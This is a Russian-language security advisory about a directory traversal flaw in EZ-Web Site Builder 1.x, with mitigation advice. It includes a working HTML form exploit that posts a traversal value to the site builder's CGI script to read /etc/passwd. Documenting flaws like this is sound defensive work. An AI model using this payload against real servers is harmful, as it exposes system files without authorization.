Дата публикации: | 05.09.2003 |
Всего просмотров: | 1009 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Раскрытие важных данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | EZ-Web Site Builder 1.x |
Уязвимые версии: EZ-Web Site Builder 1.x Описание: Уязвимость обнаружена в EZ-Web Site Builder. Удаленный пользователь может получить доступ к произвольным файлам на уязвимом сервере. Программа должным образом не обрабатывает параметр "selectedpage" перед открытием файла, используя встроенный редактор. В результате удаленный пользователь может представить специально обработанное значение для параметра "selectedpage", чтобы получить доступ к файлам, расположенным вне wwwroot каталога. Пример/Эксплоит: <html><body><p><center> <b>Mein 31337 Exploit :-P</b><br> <form action="http://targethost.com/cgi-bin/sbcgi/sitebuilder.cgi" method=POST> <input type="hidden" name="username" value="targetuser"> <input type="hidden" name="password" value="targetpassword"> <input type="hidden" name="selectedpage" value="../../../../../../../../../../etc/passwd"> <p><input type="submit" name="action" value="Yes - Use Advanced Edi tor"> <p><input type="submit" value="Return to Site Builder"> </form> </center></body></html> URL производителя: http://newerascripts.com/ Решение: Ограничьте доступ к сайту доверенным пользователям. Отредактируйте исходный код, чтобы фильтровались злонамеренные символы. Используйте альтернативное программное обеспечение. |
|
Ссылки: | Directory Traversal in SITEBUILDER - v1.4 |